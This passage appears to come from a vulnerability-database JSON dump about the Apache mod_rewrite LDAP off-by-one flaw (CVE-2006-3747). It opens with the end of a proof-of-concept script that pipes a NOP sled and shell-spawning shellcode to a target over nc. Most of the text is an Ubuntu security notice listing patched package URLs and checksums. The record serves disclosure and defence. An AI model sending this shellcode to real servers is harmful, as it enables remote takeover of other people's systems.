exit\r\nfi\r\n\r\nhost=$1\r\n\r\necho -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%\r\n31%c0%31 %db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%\r\n01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%\r\n31%c0%89%46%10%b0%10%89%46%08% b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%\r\nb3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%\r\nc9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%\r\n23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%\r\n08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%\r\ncd %80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%\r\n77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:\r\n$host\r\n\r\n" | nc $host 80\r\n\r\n\r\nMore info is coming at http://ciberjacobo.com/sec/mod_rewrite.html\r\n\r\n\r\n-- \r\nJacobo Avariento Gimeno\r\nhttp://ciberjacobo.com\r\nOpenPGP key: http://ciberjacobo.com/key.pem", "edition": 1, "modified": "2006-08-21T00:00:00", "published": "2006-08-21T00:00:00", "id": "SECURITYVULNS:DOC:13975", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13975", "title": "POC & exploit for Apache mod_rewrite off-by-one", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:18", "bulletinFamily": "software", "cvelist": ["CVE-2006-3747"], "description": "=========================================================== \r\nUbuntu Security Notice USN-328-1 July 27, 2006\r\napache2 vulnerability\r\nCVE-2006-3747\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 5.04\r\nUbuntu 5.10\r\nUbuntu 6.06 LTS\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 5.04:\r\n apache2-mpm-perchild 2.0.53-5ubuntu5.6\r\n apache2-mpm-prefork 2.0.53-5ubuntu5.6\r\n apache2-mpm-threadpool 2.0.53-5ubuntu5.6\r\n apache2-mpm-worker 2.0.53-5ubuntu5.6\r\n\r\nUbuntu 5.10:\r\n apache2-mpm-perchild 2.0.54-5ubuntu4.1\r\n apache2-mpm-prefork 2.0.54-5ubuntu4.1\r\n apache2-mpm-threadpool 2.0.54-5ubuntu4.1\r\n apache2-mpm-worker 2.0.54-5ubuntu4.1\r\n\r\nUbuntu 6.06 LTS:\r\n apache2-mpm-perchild 2.0.55-4ubuntu2.1\r\n apache2-mpm-prefork 2.0.55-4ubuntu2.1\r\n apache2-mpm-worker 2.0.55-4ubuntu2.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nMark Dowd discovered an off-by-one buffer overflow in the mod_rewrite\r\nmodule's ldap scheme handling. On systems which activate\r\n"RewriteEngine on", a remote attacker could exploit certain rewrite\r\nrules to crash Apache, or potentially even execute arbitrary code\r\n(this has not been verified).\r\n\r\n"RewriteEngine on" is disabled by default. Systems which have this\r\ndirective disabled are not affected at all.\r\n\r\n\r\nUpdated packages for Ubuntu 5.04:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.diff.gz\r\n Size/MD5: 109849 b9346454def0a9b0ed83e5c31e5715d1\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6.dsc\r\n Size/MD5: 1159 a4def08b6aff949a8503606f49614bfd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53.orig.tar.gz\r\n Size/MD5: 6925351 40507bf19919334f07355eda2df017e5\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.53-5ubuntu5.6_all.deb\r\n Size/MD5: 3578948 9c1bfb6108268f5438673aa522459e9e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.53-5ubuntu5.6_all.deb\r\n Size/MD5: 34364 8a61625863e9135f4ad5bcf4d6b5cb7b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 826722 d3cbadc06958f8247345bcf851047f06\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 221644 5759cbbf3cbeffcf796967de7ed1edf6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 217284 a65b171976c4575530fc6e8f06f48822\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 220692 f39e9387d0fde69d26530f1340ebd2b4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 168046 692d290a85d73e77b8ca6657fc71cc09\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 168822 f2677841cd39b26c9262b18752cc4f68\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 93502 1cd458dd0ad1c5e6190eef8115066061\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 34294 4405aaf5e8d6d5ba6ae43cefba440323\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 279670 bee6e2360d03837a9f474f4519a2b449\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_amd64.deb\r\n Size/MD5: 138178 2f74d6f152fc98202903688b30185c77\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 789726 fd570ca5737770335853e2f4e5f260b5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 201924 1a4dae1a8a9c6ef8ce9732d06e4fddf6\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 197692 e8c111bd39f8911463aabda812946282\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 201118 ac29377492d905679525927368fc9735\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 168050 adeb116ef7c6526cdaf7a1c8ac106239\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 168828 c4402140647838846c51fdce9ee879d8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 91230 a02d0b374da62558f4f81c2ac0214791\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 34290 3a732750f6f27607b5c57f8d28848bf9\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 257604 dd755d2b6660a4539a0d0ef12d9ee1a4\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_i386.deb\r\n Size/MD5: 128830 bb403a8fad936a0d984dc9e9e9960410\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 856012 d5398302b1a8ee33e6aa2b072a49f00c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 214930 1344c775b350d76cebd600c44ab746e5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 210038 98c1f7c0344f802451adaed9ec136057\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 213964 2c1a05518f573f59c22a24aab31fa96d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 168032 4ec1359d21c77c3e404b29906686aada\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 168830 b659aae402e4288ed796b58cc6e72272\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 102882 03b81e86cfd0fbab9c23d33fc65685bb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 34290 5f92cd47424b1e9783663a2840afa9f5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 272938 54bcdfc67e28267ae1ec35797f0e5af2\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.53-5ubuntu5.6_powerpc.deb\r\n Size/MD5: 135176 807eb136292652bf363431d3ae1ef1ad\r\n\r\nUpdated packages for Ubuntu 5.10:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.diff.gz\r\n Size/MD5: 116024 b53c0d8c432054825e233e90d6f79185\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1.dsc\r\n Size/MD5: 1159 90ede3b8d1ee455fa6a77e6f9ecf3c25\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54.orig.tar.gz\r\n Size/MD5: 7493636 37d0d0a3e25ad93d37f0483021e70409\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.54-5ubuntu4.1_all.deb\r\n Size/MD5: 3862918 e67e0de3ac73965b6f67fceeecabdd4f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-threadpool_2.0.54-5ubuntu4.1_all.deb\r\n Size/MD5: 35212 d4dc3c2515f09ec7f37efcfd5436779b\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 826232 57008eb5cc674891d4707b8b33f5af8d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 226166 a9efe63e80286d4ced4877ae4bcf1dbe\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 220784 2bbd3faed82d0d8656e311346c134d84\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 225376 599a089934ad760656287d0e680b9de2\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 169428 f69d3ce076ecd8e7d9dc37cb8e543b40\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 170172 6fead4ff8126ded741f4ac5e424b4bad\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 93152 3fb415d787aad22345e513206e8e8479\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 35140 62450c6ab735e10b67ad457219b0944c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 283424 4fce24ccdbdb1e27a5be16ba0de4d8b8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_amd64.deb\r\n Size/MD5: 142830 e4ca649a33bc48b547d134e0587432d7\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 780832 2f02a9060e304224ed9e7c3039adf90c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 201392 c1f7f10d3c4d570e002f625064bbbcb3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 197288 378ab4f09803643496075717a8e6c533\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 200848 cceb75fd6bb828376e9dd558bc41a833\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 169428 5d396b14e48c745d411aa0607e88b8b0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 170158 cc17f207e6cbd662b9127f6068be5596\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 91434 da701963eefb26198585efa199320c39\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 35146 e4cf87606456c5a7df12705882883f93\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 259762 aefba46cb0453d69b9cd46c315b33fa8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_i386.deb\r\n Size/MD5: 131222 65c39f9c635463ef6bbb19400c1577c0\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 854152 0a4ad05f422b52a20db9f9f835e743bd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 218344 ad6af747493a5f88dc59d74130a81972\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 213996 4dee81cbe8f41267e3724cdc02997e48\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 217488 a80c6725824125f83a5e5c6ba9721e8a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 169426 fe5d1b5946e456811c993f3852d2a42a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 170160 8fe022611640222f696e71c0c98e6825\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 103446 0464063bde5b27a75cbb3786e1b03dbd\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 35146 270f6fdf49eba45102c8f803ad453fc7\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 279034 db649e0c8ab3e27f7aa0de522423b66d\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_powerpc.deb\r\n Size/MD5: 140286 dc00d0716d93f668d85e88489ea40500\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 799390 d08a9ae0da77a651c03a34dbfc60cb49\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 209402 fd1537a75780215c521eaa1d86f6dac0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 205052 c671dc14f003efd78724b590bd47c17a\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 208612 9a3bd42326cf873f0d75edad80400a1f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 169440 e57d15a89648fc725f8c2e57517ce839\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 170182 97633fec703ccf87290d8cd258098ccc\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 93092 5dd42a24b752012bd4f10676f91bb7d3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 35146 c72067dac60dcaf6995186411ce8a714\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 264966 19a4f77fea0a28b9097bda0f77b533a8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4.1_sparc.deb\r\n Size/MD5: 128274 86c0e3518fc19e1371ad928e09ead70b\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.diff.gz\r\n Size/MD5: 115088 d045e2652698d0cfaa11b9e65252bb67\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1.dsc\r\n Size/MD5: 1148 cda4a30a1e278c238b1dc2e9c8098655\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz\r\n Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.diff.gz\r\n Size/MD5: 352050 67258b257c6267ff4f822a67098ca9ad\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1.dsc\r\n Size/MD5: 1102 1bd4dbdc8388cc6e4c79322f31cb8151\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34.orig.tar.gz\r\n Size/MD5: 3105068 9d289f80ddca7389ab9bc6970636d6ad\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dev_1.3.34-2ubuntu0.1_all.deb\r\n Size/MD5: 332876 a5a005bf56c8c1dfa4e3128a1cf78f67\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-doc_1.3.34-2ubuntu0.1_all.deb\r\n Size/MD5: 1195566 4d3cbdac9a6fdb435d590dbe90ca4a86\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.1_all.deb\r\n Size/MD5: 2124178 dffcfe4126e3b53e32d19166bf3f853f\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 875232 49196a7f16300f0968d03e26b87f4112\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 8868800 609262555eed5f16f37a05937557ac71\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 533004 01819af5f2f36a4a109575b0340e3a01\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 517002 962478c0d73709e5ebadb6698a5b35bb\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 832826 46d8ac4963392385b154ee311717b125\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 227652 e57d6f19beb0cc3c731a22396037f853\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 222770 36d29beb67174e796f22770f812e521e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 227350 1dd4f42480f3801041a40f338c77be79\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 170918 7e0203cdf1f52291bd37207736a8bab8\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 171690 4f9fd4647a2df63abd84ae7c6f296efa\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 93770 7a4a247b34afd27c9e81f222e7b26a9e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 35748 807f1c5a0f5d94370e5f7c712517d77c\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_amd64.deb\r\n Size/MD5: 408106 3b8da12e0330f042fbb082e61014097d\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_amd64.deb\r\n Size/MD5: 495138 2eee03a0677d1b236f4798257fa671a3\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 285168 7c95e82707461eb6fe6139af048e5386\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_amd64.deb\r\n Size/MD5: 143804 df89f11a7f4fd5010c827ec9e8897af5\r\n\r\n i386 architecture (x86 compatible Intel/AMD)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 836848 d4e547eca9e76aa5e2e0e4344fe68595\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 8630002 9a8de2e1f34e3401f6bc4c85faf79643\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 499622 c7a9b16e4a979eafe4955368a70f76cc\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 487480 010350ad0468be173b27cd687fa7bfb0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 785996 1e7eba9a96e1c96b24c425fc1d1b0c8e\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 202290 dbb1357c99b8a574b6436e858db28767\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 198272 a6009454cdd2743972c5f4c821dd5dea\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 201822 c482c5e814f1bb93fc5be21349f21a08\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 170934 df6d16ffdeac51db8b96afd789bbb72c\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 171698 2ca5dee34aebf25d7d0d4036babddab0\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 91722 c8921ae03c537badefaf5254f491b0e5\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 35754 e0c31ed00cec17eb1ee96b06091f4101\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.34-2ubuntu0.1_i386.deb\r\n Size/MD5: 384724 ba1902bbd2db824e53ff1793252e5260\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.4-2ubuntu0.1_i386.deb\r\n Size/MD5: 489468 a4bf30924bedcd2c08254294e32877fc\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 261268 e4645315c2f1ea2cfda97220513c3129\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.1_i386.deb\r\n Size/MD5: 131698 f7cab6c91b232acd83a711d0cb8dce4b\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5)\r\n\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 916034 11f263805524e1485c87436981f4a0ff\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 8951098 9696192a5d27810ef15d8adac8a998e1\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 523778 8b04ab792246c49a9f6396a050a51a17\r\n http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.34-2ubuntu0.1_powerpc.deb\r\n Size/MD5: 513608 802726ffd0f1608fe5368cc01380636f\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 858972 127e8eaf484042684f6333e13eec5364\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.1_powerpc.deb\r\n Size/MD5: 219670 666bbf96509154d2733eac8bf420ad42\r\n http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.1_powerpc.deb\r\n 